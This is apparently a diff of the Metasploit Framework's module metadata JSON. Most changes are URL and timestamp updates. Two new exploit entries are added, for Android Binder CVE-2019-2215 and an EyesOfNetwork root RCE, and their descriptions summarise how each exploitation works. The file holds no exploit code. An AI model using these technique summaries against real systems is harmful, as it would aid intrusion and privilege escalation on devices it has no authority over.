     "fullname": "auxiliary/analyze/modbus_zip",
@@ -10296,7 +10031,7 @@
     "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n        File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n        where NFRAgent.exe fails to generate a response in a secure way, copying user\n        controlled data into a fixed-length buffer in the heap without bounds checking.\n        This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).",
     "references": [
       "CVE-2012-4956",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
     ],
     "platform": "",
     "arch": "",
@@ -10317,7 +10052,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb",
     "is_install_path": true,
     "ref_name": "dos/http/novell_file_reporter_heap_bof",
@@ -11545,7 +11280,7 @@
     "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n        of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n        exists in the handling of malformed log packets, with an unexpected long level field.\n        The root cause of the vulnerability is a combination of usage of uninitialized memory\n        from the stack and a dangerous string copy. This module has been tested successfully\n        on Yokogawa CENTUM CS 3000 R3.08.50.",
     "references": [
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
       "CVE-2014-0781"
     ],
     "platform": "",
@@ -11558,7 +11293,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb",
     "is_install_path": true,
     "ref_name": "dos/scada/yokogawa_logsvr",
@@ -11596,7 +11331,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-03-23 14:55:18 +0000",
+    "mod_time": "2020-02-25 19:59:27 +0000",
     "path": "/modules/auxiliary/dos/smb/smb_loris.rb",
     "is_install_path": true,
     "ref_name": "dos/smb/smb_loris",
@@ -12763,7 +12498,7 @@
       "URL-http://pastie.org/private/feg8du0e9kfagng4rrg",
       "URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html",
       "EDB-18606",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update"
+      "URL-https://blog.rapid7.com/2012/03/21/metasploit-update"
     ],
     "platform": "",
     "arch": "",
@@ -12775,7 +12510,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb",
     "is_install_path": true,
     "ref_name": "dos/windows/rdp/ms12_020_maxchannelids",
@@ -14940,7 +14675,7 @@
     ],
     "description": "Generates a .webarchive file for Mac OS X Safari that will attempt to\n        inject cross-domain Javascript (UXSS), silently install a browser\n        extension, collect user information, steal the cookie database,\n        and steal arbitrary local files.\n\n        When opened on the target machine the webarchive file must not have the\n        quarantine attribute set, as this forces the webarchive to execute in a\n        sandbox.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format"
+      "URL-https://blog.rapid7.com/2013/04/25/abusing-safaris-webarchive-file-format"
     ],
     "platform": "",
     "arch": "",
@@ -14952,7 +14687,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb",
     "is_install_path": true,
     "ref_name": "gather/apple_safari_webarchive_uxss",
@@ -16029,7 +15764,7 @@
     "disclosure_date": null,
     "type": "auxiliary",
     "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
     ],
     "description": "This module checks for the public source IP address of the current\n        route to the RHOST by querying the public web application at ifconfig.me.\n        It should be noted this module will register activity on ifconfig.me,\n        which is not affiliated with Metasploit.",
     "references": [
@@ -16054,7 +15789,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
     "path": "/modules/auxiliary/gather/external_ip.rb",
     "is_install_path": true,
     "ref_name": "gather/external_ip",
@@ -27726,7 +27461,7 @@
     "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n        arbitrary text files via a directory traversal while handling requests to /FSF/CMD\n        with an FSFUI record with UICMD 126. This module has been tested successfully\n        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n        Reporter 1.0.1).",
     "references": [
       "CVE-2012-4958",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
     ],
     "platform": "",
     "arch": "",
@@ -27747,7 +27482,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
@@ -27773,7 +27508,7 @@
     "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n        arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and\n        CMD 103, specifying a full pathname. This module has been tested successfully\n        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n        Reporter 1.0.1).",
     "references": [
       "CVE-2012-4957",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
     ],
     "platform": "",
     "arch": "",
@@ -27795,7 +27530,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
@@ -28702,7 +28437,7 @@
     "description": "This module attempts to identify Ruby on Rails instances vulnerable to\n        an arbitrary object instantiation flaw in the XML request processor.",
     "references": [
       "CVE-2013-0156",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
+      "URL-https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
     ],
     "platform": "",
     "arch": "",
@@ -28723,7 +28458,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/rails_xml_yaml_scanner",
@@ -29548,7 +29283,7 @@
     "references": [
       "CVE-2013-3621",
       "CVE-2013-3623",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
     ],
     "platform": "",
     "arch": "",
@@ -29569,7 +29304,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_cgi_scanner",
@@ -29596,7 +29331,7 @@
     "description": "This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI\n        controllers. An attacker with access to the publicly-available firmware can perform\n        man-in-the-middle attacks and offline decryption of communication to the controller.\n        This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n        version SMT_X9_214.",
     "references": [
       "CVE-2013-3619",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
     ],
     "platform": "",
     "arch": "",
@@ -29608,7 +29343,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
@@ -29634,7 +29369,7 @@
     ],
     "description": "This module abuses a directory traversal vulnerability in the url_redirect.cgi application\n        accessible through the web interface of Supermicro Onboard IPMI controllers.  The vulnerability\n        is present due to a lack of sanitization of the url_name parameter. This allows an attacker with\n        a valid, but not necessarily administrator-level account, to access the contents of any file\n        on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for\n        all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)\n        with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and\n        /wsman/simple_auth.passwd",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
       "URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
     ],
     "platform": "",
@@ -29656,7 +29391,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
@@ -32427,7 +32162,7 @@
     "description": "This module exploits a hardcoded user and password for the GetFile maintenance\n        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n        Console and can be triggered by sending a specially crafted request to the rtrlet component,\n        allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of\n        remote files. This module has been successfully tested on Novell ZENworks Asset\n        Management 7.5.",
     "references": [
       "CVE-2012-4933",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
+      "URL-https://blog.rapid7.com/2012/10/11/cve-2012-4933-novell-zenworks"
     ],
     "platform": "",
     "arch": "",
@@ -32448,7 +32183,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
@@ -32474,7 +32209,7 @@
     "description": "This module exploits a hardcoded user and password for the GetConfig maintenance\n        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n        Console and can be triggered by sending a specially crafted request to the rtrlet component,\n        allowing a remote unauthenticated user to retrieve the configuration parameters of\n        Novell Zenworks Asset Managment, including the database credentials in clear text.\n        This module has been successfully tested on Novell ZENworks Asset Management 7.5.",
     "references": [
       "CVE-2012-4933",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
+      "URL-https://blog.rapid7.com/2012/10/11/cve-2012-4933-novell-zenworks"
     ],
     "platform": "",
     "arch": "",
@@ -32495,7 +32230,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
@@ -34252,7 +33987,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-02-08 15:31:27 +0000",
     "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mssql/mssql_login",
@@ -34370,7 +34105,7 @@
     "references": [
       "CVE-2012-2122",
       "OSVDB-82804",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
+      "URL-https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
     ],
     "platform": "",
     "arch": "",
@@ -34382,7 +34117,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
@@ -34494,7 +34229,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-02-08 15:31:27 +0000",
     "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/mysql/mysql_login",
@@ -35614,7 +35349,7 @@
       "Patrik Karlsson <patrik@cqure.net>",
       "todb <todb@metasploit.com>"
     ],
-    "description": "This module attempts to authenticate against an Oracle RDBMS\n        instance using username and password combinations indicated\n        by the USER_FILE, PASS_FILE, and USERPASS_FILE options.",
+    "description": "This module attempts to authenticate against an Oracle RDBMS\n        instance using username and password combinations indicated\n        by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n\n        Due to a bug in nmap versions 6.50-7.80 may not work.",
     "references": [
       "URL-http://www.oracle.com/us/products/database/index.html",
       "CVE-1999-0502",
@@ -35630,7 +35365,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-05 14:13:38 +0000",
+    "mod_time": "2020-02-21 08:41:42 +0000",
     "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/oracle/oracle_login",
@@ -39959,7 +39694,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2019-05-22 13:00:09 +0000",
+    "mod_time": "2020-02-26 12:17:59 +0000",
     "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/pipe_auditor",
@@ -40321,7 +40056,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-03-02 11:50:19 +0000",
     "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/smb/smb_login",
@@ -40738,7 +40473,7 @@
     "description": "This module will extract WEP keys and WPA preshared keys from\n        Arris DG950A cable modems.",
     "references": [
       "CVE-2014-4863",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
+      "URL-https://blog.rapid7.com/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
     ],
     "platform": "",
     "arch": "",
@@ -40750,7 +40485,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-07-09 12:56:00 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/arris_dg950",
@@ -40775,7 +40510,7 @@
     ],
     "description": "This module extracts password hashes from certain Brocade load\n        balancer devices.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
     ],
     "platform": "",
     "arch": "",
@@ -40787,7 +40522,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/brocade_enumhash",
@@ -40965,7 +40700,7 @@
     ],
     "description": "This module extracts WEP keys and WPA preshared keys from\n        certain Netopia cable modems.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
     ],
     "platform": "",
     "arch": "",
@@ -40977,7 +40712,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/netopia_enum",
@@ -41271,7 +41006,7 @@
     ],
     "description": "This module will extract WEP keys and WPA preshared keys from\n        certain Ubee cable modems.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
     ],
     "platform": "",
     "arch": "",
@@ -41283,7 +41018,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
     "is_install_path": true,
     "ref_name": "scanner/snmp/ubee_ddw3611",
@@ -41543,7 +41278,7 @@
     "description": "This module scans for the Juniper SSH backdoor (also valid on Telnet).\n        Any username is required, and the password is <<< %s(un='%s') = %u.",
     "references": [
       "CVE-2015-7755",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
+      "URL-https://blog.rapid7.com/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
       "URL-https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713"
     ],
     "platform": "",
@@ -41556,7 +41291,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-08-15 06:48:35 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/juniper_backdoor",
@@ -42285,7 +42020,7 @@
       "BID-51182",
       "CVE-2011-4862",
       "EDB-18280",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
+      "URL-https://blog.rapid7.com/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
     ],
     "platform": "",
     "arch": "",
@@ -42297,7 +42032,7 @@
       "telnet"
     ],
     "targets": null,
-    "mod_time": "2018-02-14 09:19:28 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
     "is_install_path": true,
     "ref_name": "scanner/telnet/telnet_encrypt_overflow",
@@ -44094,7 +43829,7 @@
     ],
     "description": "This module will automatically serve browser exploits. Here are the options you can\n        configure:\n\n        The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example,\n        if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.\n\n        The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash\n        exploits, you can set this. Also note that the Exclude option will always be evaluated\n        after the Include option.\n\n        The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.\n        By default, 20 will be loaded. But note that the client will probably not be vulnerable\n        to all 20 of them, so only some will actually be served to the client.\n\n        The HTMLContent option allows you to provide a basic webpage. This is what the user behind\n        the vulnerable browser will see. You can simply set a string, or you can do the file://\n        syntax to load an HTML file. Note this option might break exploits so try to keep it\n        as simple as possible.\n\n        The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to\n        get. The default -1 means unlimited. Combining this with other options such as RealList\n        and Custom404, you can get information about which visitors (IPs) clicked on your malicious\n        link, what exploits they might be vulnerable to, redirect them to your own internal\n        training website without actually attacking them.\n\n        For more information about Browser Autopwn, please see the referenced blog post.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
+      "URL-https://blog.rapid7.com/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
     ],
     "platform": "",
     "arch": "",
@@ -44106,7 +43841,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/server/browser_autopwn2.rb",
     "is_install_path": true,
     "ref_name": "server/browser_autopwn2",
@@ -45608,7 +45343,7 @@
     "references": [
       "CVE-2014-4877",
       "URL-https://bugzilla.redhat.com/show_bug.cgi?id=1139181",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
+      "URL-https://blog.rapid7.com/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
     ],
     "platform": "",
     "arch": "",
@@ -45620,7 +45355,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/server/wget_symlink_file_write.rb",
     "is_install_path": true,
     "ref_name": "server/wget_symlink_file_write",
@@ -47256,7 +46991,7 @@
     ],
     "description": "This module emulates a webserver leaking PII data",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
+      "URL-https://blog.rapid7.com/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
     ],
     "platform": "",
     "arch": "",
@@ -47268,7 +47003,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/vsploit/pii/web_pii.rb",
     "is_install_path": true,
     "ref_name": "vsploit/pii/web_pii",
@@ -49480,6 +49215,52 @@
     },
     "needs_cleanup": null
   },
+  "exploit_android/local/binder_uaf": {
+    "name": "Android Binder Use-After-Free Exploit",
+    "fullname": "exploit/android/local/binder_uaf",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-26",
+    "type": "exploit",
+    "author": [
+      "Jann Horn",
+      "Maddie Stone",
+      "grant-h",
+      "timwr"
+    ],
+    "description": "This module exploits CVE-2019-2215, which is a use-after-free in Binder in the\n          Android kernel. The bug is a local privilege escalation vulnerability that\n          allows for a full compromise of a vulnerable device. If chained with a browser\n          renderer exploit, this bug could fully compromise a device through a malicious\n          website.\n          The freed memory is replaced with an iovec structure in order to leak a pointer\n          to the task_struct. Finally the bug is triggered again in order to overwrite\n          the addr_limit, making all memory (including kernel memory) accessible as part\n          of the user-space memory range in our process and allowing arbitrary reading\n          and writing of kernel memory.",
+    "references": [
+      "CVE-2019-2215",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1942",
+      "URL-https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html",
+      "URL-https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/",
+      "URL-https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c"
+    ],
+    "platform": "Android,Linux",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-29 11:22:59 +0000",
+    "path": "/modules/exploits/android/local/binder_uaf.rb",
+    "is_install_path": true,
+    "ref_name": "android/local/binder_uaf",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
   "exploit_android/local/futex_requeue": {
     "name": "Android 'Towelroot' Futex Requeue Kernel Exploit",
     "fullname": "exploit/android/local/futex_requeue",
@@ -49914,7 +49695,7 @@
       "Cliff Stoll",
       "wvu <wvu@metasploit.com>"
     ],
-    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.",
+    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only bsd/vax/shell_reverse_tcp is supported.",
     "references": [
       "URL-https://en.wikipedia.org/wiki/Morris_worm",
       "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -49934,7 +49715,7 @@
     "targets": [
       "@(#)fingerd.c   5.1 (Berkeley) 6/6/85"
     ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
     "path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
     "is_install_path": true,
     "ref_name": "bsd/finger/morris_fingerd_bof",
@@ -50923,7 +50704,7 @@
       "CWE-94",
       "OSVDB-112004",
       "EDB-34765",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
+      "URL-https://blog.rapid7.com/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
       "URL-https://access.redhat.com/articles/1200223",
       "URL-https://seclists.org/oss-sec/2014/q3/649"
     ],
@@ -50948,7 +50729,7 @@
     "targets": [
       "Automatic Targeting"
     ],
-    "mod_time": "2018-09-17 22:29:20 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb",
     "is_install_path": true,
     "ref_name": "linux/http/advantech_switch_bash_env_exec",
@@ -53610,6 +53391,60 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/eyesofnetwork_autodiscovery_rce": {
+    "name": "EyesOfNetwork AutoDiscovery Target Command Execution",
+    "fullname": "exploit/linux/http/eyesofnetwork_autodiscovery_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-06",
+    "type": "exploit",
+    "author": [
+      "Clément Billac",
+      "bcoles <bcoles@gmail.com>",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3\n        and prior in order to execute arbitrary commands as root.\n\n        This module takes advantage of a command injection vulnerability in the\n        `target` parameter of the AutoDiscovery functionality within the EON web\n        interface in order to write an Nmap NSE script containing the payload to\n        disk. It then starts an Nmap scan to activate the payload. This results in\n        privilege escalation because the`apache` user can execute Nmap as root.\n\n        Valid credentials for a user with administrative privileges are required.\n        However, this module can bypass authentication via two methods, i.e. by\n        generating an API access token based on a hardcoded key, and via SQLI.\n        This module has been successfully tested on EyesOfNetwork 5.3 with API\n        version 2.4.2.",
+    "references": [
+      "CVE-2020-8654",
+      "CVE-2020-8655",
+      "CVE-2020-8656",
+      "CVE-2020-8657",
+      "EDB-48025"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-03-02 15:10:46 +0000",
+    "path": "/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/eyesofnetwork_autodiscovery_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/http/f5_icall_cmd": {
     "name": "F5 iControl iCall::Script Root Command Execution",
     "fullname": "exploit/linux/http/f5_icall_cmd",
@@ -54290,7 +54125,7 @@
       "Unix In-Memory",
       "Linux Dropper"
     ],
-    "mod_time": "2019-06-24 13:38:14 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
     "path": "/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb",
     "is_install_path": true,
     "ref_name": "linux/http/hp_van_sdn_cmd_inject",
@@ -55502,7 +55337,7 @@
       "CVE-2013-0136",
       "OSVDB-93444",
       "US-CERT-VU-701572",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
     ],
     "platform": "Linux",
     "arch": "x86",
